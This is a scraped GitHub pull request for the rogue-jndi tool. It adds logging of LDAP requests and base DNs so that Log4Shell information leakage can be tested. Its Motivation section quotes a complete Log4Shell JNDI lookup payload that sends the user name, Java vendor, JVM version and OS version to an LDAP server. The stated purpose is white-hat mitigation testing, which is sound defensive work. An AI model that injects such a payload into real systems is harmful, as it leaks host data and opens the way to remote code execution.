rogue-jndi Log request and base DN to validate Log4Shell information leakage attack vector

Log request and base DN to validate Log4Shell information leakage attack vector

Open lhotari opened this issue 3 years ago • 0 comments

Motivation

For testing Log4Shell information leakage attack vector with inputs such as ${jndi:ldap://127.0.1.1:1389/user=${env:USER},vendor=${sys:java.vendor},javaversion=${sys:java.vm.version},os=${sys:os.version}} Suitable for usage with log4shell-mitigation-tester. Strictly meant for white hat purposes and for understanding Log4Shell.

Modifications

Log request and base for each request
match controller with simple contains check

Dec 13 '21 16:12 lhotari

rogue-jndi rogue-jndi copied to clipboard

Log request and base DN to validate Log4Shell information leakage attack vector

Motivation

Modifications

rogue-jndi
rogue-jndi copied to clipboard